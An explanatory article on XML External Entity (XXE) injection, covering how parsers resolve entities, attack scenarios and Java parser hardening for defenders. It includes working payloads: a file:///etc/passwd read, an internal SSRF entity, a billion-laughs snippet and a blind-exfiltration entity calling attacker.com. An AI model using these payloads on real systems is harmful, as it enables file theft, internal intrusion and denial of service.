Understanding XML and XXE Injections
XML External Entity (XXE) injections are severe security vulnerabilities that exploit weaknesses in how applications parse XML input. Attackers inject malicious external entity references to access sensitive files, interact with internal systems, or exfiltrate data. These attacks often target web services, APIs, and applications that process XML without proper security controls.
How XXE Attacks Work
XXE vulnerabilities arise when an XML parser resolves external entities (references to files or other resources outside the document) without restriction. Here’s a simplified attack flow:
- Malicious XML Input: An attacker submits XML containing a crafted external entity.
- Parser Processing: The application’s XML parser resolves the entity, fetching the external resource.
- Data Exposure: The parser returns the contents of the external resource (e.g., /etc/passwd) in the response.
- Impact: Unauthorized access to files, internal network scanning, or denial-of-service (DoS) attacks.
Example Attack Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
If parsed insecurely, this payload exposes the contents of /etc/passwd.
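The "Parser Processing" step can be observed without reading any real file. The following is a minimal Java sketch, assuming the JDK's built-in JAXP implementation; the class name EntityLookupTrace and the method requestedResources are hypothetical. It deliberately leaves DTDs and external general entities enabled, but installs an EntityResolver that records each requested system identifier and returns empty content, so the lookup is visible while /etc/passwd is never opened.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

final class EntityLookupTrace {
    // The example payload from this section.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
        + "<foo>&xxe;</foo>";

    /** Parses the XML and returns the system IDs the parser asked to resolve. */
    static List<String> requestedResources(String xml) {
        List<String> requested = new ArrayList<>();
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Deliberately permissive (for demonstration only) so the lookup happens.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false);
            factory.setFeature("http://xml.org/sax/features/external-general-entities", true);
            DocumentBuilder builder = factory.newDocumentBuilder();
            builder.setEntityResolver((publicId, systemId) -> {
                requested.add(systemId);
                // Hand back empty content instead of opening the real resource.
                return new InputSource(new StringReader(""));
            });
            builder.parse(new InputSource(new StringReader(xml)));
        } catch (Exception e) {
            throw new IllegalStateException("unexpected parse failure", e);
        }
        return requested;
    }

    public static void main(String[] args) {
        System.out.println(requestedResources(PAYLOAD));
    }
}
```

For the payload above, the recorded list should contain one identifier ending in /etc/passwd, while a document without a DOCTYPE triggers no lookups at all.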
Key Concepts Behind XXE
XML: The Foundation
XML (eXtensible Markup Language) is a markup language designed for storing and transporting structured data. Its human-readable format and flexibility make it widely used in:
- Web Services: SOAP and REST APIs for data exchange.
- Configuration Files: Application settings (e.g., web.config, pom.xml).
- Document Storage: Structured data like invoices or medical records.
Document Type Definitions (DTDs)
DTDs define the structure and rules of an XML document, including:
- Element declarations: Valid tags and their hierarchy.
- Entity declarations: Placeholders for data, including external entities that can trigger XXE.
Critical Risk: DTDs can declare external entities (e.g., <!ENTITY xxe SYSTEM "http://attacker.com/malicious.dtd">), which parsers may resolve automatically.
XML Entities: The Attack Vector
Entities are variables in XML that substitute values. Types include:
| Entity Type | Description | XXE Risk |
|---|---|---|
| Internal | Defined within the XML document (e.g., <!ENTITY name "value">). | Low (unless nested to force exponential expansion). |
| External | References external resources (e.g., <!ENTITY xxe SYSTEM "file:///etc/passwd">). | High (primary XXE vector). |
| Parameter | Declared and referenced only inside DTDs (e.g., <!ENTITY % param "value">, used as %param;). | Medium (can enable blind XXE). |
| General | Referenced in document content with the &name; syntax; may be internal or external. | Depends on whether the entity is external. |
| Character | Predefined entities and character references (e.g., &lt; for <, &amp; for &). | Low. |
XML Parsers: The Weak Link
Parsers read and interpret XML. Common types and their risks:
| Parser | Description | XXE Vulnerability |
|---|---|---|
| DOM | Loads the entire XML document into memory as a tree; supports XPath queries. | High if external entities are left enabled, since resolved content ends up in the tree. |
| SAX | Event-driven; reads XML sequentially. | Medium (depends on configuration). |
| StAX | Pull-based streaming; balances performance and memory. | Medium (if external entities are enabled). |
| XPath | Query language evaluated over parsed XML rather than a parser itself; can be exploited if combined with XXE. | High (e.g., XPath injection + XXE). |
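Since the risk for SAX and StAX depends on configuration, here is a hedged Java sketch of how the two streaming APIs might be locked down with the JDK's built-in JAXP implementation. The class and method names are hypothetical; the feature URI and the XMLInputFactory properties are standard JAXP and StAX settings, though other parser implementations may not honor them identically.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

final class StreamingParserHardening {
    static final String PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
        + "<foo>&xxe;</foo>";

    /** Returns true if a SAX parser that forbids DOCTYPE declarations accepts the document. */
    static boolean saxAccepts(String xml) {
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            factory.newSAXParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return true;
        } catch (Exception e) {
            return false; // configuration or parse failure: treat as rejected
        }
    }

    /** Returns the character data seen by a hardened StAX reader, or null if parsing failed. */
    static String staxText(String xml) {
        try {
            XMLInputFactory factory = XMLInputFactory.newFactory();
            factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
            factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
            XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
            StringBuilder text = new StringBuilder();
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
            reader.close();
            return text.toString();
        } catch (Exception e) {
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println("SAX accepts payload: " + saxAccepts(PAYLOAD));
        System.out.println("StAX text for benign input: " + staxText("<foo>hello</foo>"));
    }
}
```

How the StAX reader reacts to the payload (an exception or an unexpanded reference) can vary by implementation, so the sketch only relies on the file contents never reaching the returned text.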
Real-World XXE Attack Scenarios
1. File Disclosure
Attackers read sensitive files (e.g., /etc/shadow, config.php) by injecting external entities pointing to local files.
Example:
<!ENTITY file SYSTEM "file:///etc/passwd">
Impact: Exposure of credentials, API keys, or system configurations.
2. Server-Side Request Forgery (SSRF)
XXE can force the server to make requests to internal systems (e.g., http://localhost:8080/admin).
Example:
<!ENTITY ssrf SYSTEM "http://internal-server/admin">
Impact: Unauthorized access to internal APIs or databases.
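One way to cut off the SSRF path while still allowing internal DTD subsets is to deny every protocol for external lookups. The sketch below assumes a JAXP 1.5 or newer implementation (such as the JDK's), which supports the XMLConstants.ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA properties; the class name ExternalAccessPolicy and the method isBlocked are hypothetical.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

final class ExternalAccessPolicy {
    // Payload built from the SSRF example entity above.
    static final String SSRF_PAYLOAD =
        "<!DOCTYPE foo [ <!ENTITY ssrf SYSTEM \"http://internal-server/admin\"> ]>"
        + "<foo>&ssrf;</foo>";

    /** Returns true if the parser refused the document. */
    static boolean isBlocked(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // An empty string means no protocol (file, http, ...) is permitted
            // for external DTDs, external entities, or external schemas.
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
            factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (Exception e) {
            return true; // access denied or malformed input
        }
    }

    public static void main(String[] args) {
        System.out.println("SSRF payload blocked: " + isBlocked(SSRF_PAYLOAD));
    }
}
```

Documents that only use internal entities still parse under this policy, which makes it a possible middle ground when DTDs cannot be disabled outright.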
3. Denial-of-Service (DoS)
Attackers exploit entity expansion to crash the parser (e.g., "billion laughs" attack).
Example:
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
Impact: Parser crashes due to exponential memory consumption.
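As a rough illustration of the defense, the Java sketch below generates a nested-entity document in the style of the example and parses it with secure processing switched on. It assumes the JDK's built-in parser, which enforces an entity expansion limit under XMLConstants.FEATURE_SECURE_PROCESSING; the exact limit varies by JDK version. The class name, the method names, and the lol0 to lolN entity naming are hypothetical.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;

final class EntityExpansionGuard {
    /** Builds a document whose top entity expands to 10^levels copies of "lol". */
    static String nestedEntities(int levels) {
        StringBuilder xml = new StringBuilder("<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n");
        xml.append("<!ENTITY lol0 \"lol\">\n");
        for (int level = 1; level <= levels; level++) {
            xml.append("<!ENTITY lol").append(level).append(" \"");
            for (int i = 0; i < 10; i++) {
                xml.append("&lol").append(level - 1).append(';');
            }
            xml.append("\">\n");
        }
        xml.append("]>\n<lolz>&lol").append(levels).append(";</lolz>");
        return xml.toString();
    }

    /** Returns true if the parser aborted instead of expanding the document. */
    static boolean isRejected(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Secure processing makes the JDK parser enforce its expansion limits.
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (Exception e) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println("6 levels rejected: " + isRejected(nestedEntities(6)));
        System.out.println("1 level rejected: " + isRejected(nestedEntities(1)));
    }
}
```

Six levels require more than a million expansions, which the parser is expected to stop well before memory becomes a problem; a single level stays far below any limit and parses normally.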
4. Blind XXE
Attackers exfiltrate data without direct feedback by forcing the server to send data to an external server.
Example:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
%dtd;
Impact: Data exfiltration via out-of-band (OOB) channels.
How to Prevent XXE Attacks
1. Disable External Entities
Configure parsers to ignore external entities and DTDs entirely.
Example (Java):
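import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE declaration (the strongest single setting).
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth: never resolve external general or parameter entities.
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);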
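To see these settings in use, here is a self-contained sketch that wraps them in a helper and feeds it both a benign document and the file-disclosure payload. The class name HardenedDomParser and its methods are hypothetical; the two extra calls (setXIncludeAware and setExpandEntityReferences) are additional hardening beyond the three features above, not something the configuration strictly requires.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class HardenedDomParser {
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
        + "<foo>&xxe;</foo>";

    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        // Extra hardening (an addition to the settings above).
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    /** Returns the root element's text, or null if the parser rejected the document. */
    static String rootText(String xml) {
        try {
            Document doc = newHardenedFactory()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println("benign:  " + rootText("<foo>hello</foo>"));
        System.out.println("payload: " + rootText(PAYLOAD));
    }
}
```

Because DOCTYPE declarations are refused outright, the payload fails before any entity is resolved, while ordinary documents parse as usual.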
2. Use Safe Parsers
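Opt for parsers with secure defaults, or harden the ones you already use:
- Java: javax.xml.parsers.DocumentBuilderFactory (with secure features enabled).
- Python: defusedxml library (drop-in replacement for xml.etree.ElementTree).
- PHP: libxml_disable_entity_loader(true) (deprecated as of PHP 8.0, where libxml 2.9.0 or later disables external entity loading by default).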
3. Input Validation
- Reject XML with DTDs or external entities.
- Use allowlists for expected XML structures.
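Both checks can be combined in one validation step. The following Java sketch (Java 9 or newer, for Set.of) rejects any document with a DOCTYPE and then walks the parsed tree against an allowlist of element names. The class name, the method names, and the allowlist entries (order, id, quantity) are hypothetical placeholders for whatever structure an application actually expects.

```java
import java.io.StringReader;
import java.util.Set;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

final class XmlAllowlistValidator {
    // Hypothetical allowlist of element names the application expects.
    static final Set<String> ALLOWED = Set.of("order", "id", "quantity");

    /** Returns true only for DTD-free documents built solely from allowed elements. */
    static boolean isAcceptable(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Reject XML with DTDs (and therefore any entity declarations).
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            Document doc = factory.newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
            return onlyAllowedElements(doc.getDocumentElement());
        } catch (Exception e) {
            return false; // malformed or forbidden input
        }
    }

    // Recursively checks the element and all of its descendant elements.
    private static boolean onlyAllowedElements(Element element) {
        if (!ALLOWED.contains(element.getTagName())) {
            return false;
        }
        NodeList children = element.getChildNodes();
        for (int i = 0; i < children.getLength(); i++) {
            Node child = children.item(i);
            if (child instanceof Element && !onlyAllowedElements((Element) child)) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        System.out.println(isAcceptable("<order><id>7</id><quantity>2</quantity></order>"));
        System.out.println(isAcceptable("<order><script>x</script></order>"));
    }
}
```

A name-based allowlist is the simplest form of this idea; validating against an XML Schema would enforce structure and data types more strictly, at the cost of maintaining the schema.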
4. Least Privilege
Run XML parsers in sandboxed environments with minimal permissions.
5. Monitor and Log
Log XML parsing errors and monitor for suspicious external entity references.
Common Misconfigurations Leading to XXE
| Misconfiguration | Risk | Fix |
|---|---|---|
| Enabling DTDs | Allows external entity declarations. | Disable DTDs (disallow-doctype-decl). |
| External entity resolution | Parsers fetch external resources. | Disable external entities (external-general-entities=false). |
| Recursive entity expansion | Enables DoS attacks (e.g., "billion laughs"). | Limit entity expansion depth. |
| Unrestricted file access | Attackers read arbitrary files. | Restrict file system access in parser configurations. |
| Outdated libraries | Vulnerable to known XXE exploits. | Update parsers (e.g., libxml2, Xerces). |
Tools to Test for XXE Vulnerabilities
| Tool | Purpose | Link |
|---|---|---|
| OWASP ZAP | Automated scanner for XXE and other web vulnerabilities. | https://www.zaproxy.org/ |
| Burp Suite | Manual testing with XXE payloads and out-of-band (OOB) detection. | https://portswigger.net/burp |
| XXEinjector | Automates XXE exploitation and data exfiltration. | https://github.com/enjoiz/XXEinjector |
| xmldecoder | Tests XML parsers for XXE and other vulnerabilities. | https://github.com/OWASP/xmldecoder |
Learn More
- OWASP XXE Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- PortSwigger XXE Labs: https://portswigger.net/web-security/xxe
- CWE-611: Improper Restriction of XML External Entity Reference: https://cwe.mitre.org/data/definitions/611.html
- Defused XML (Python Library): https://pypi.org/project/defusedxml/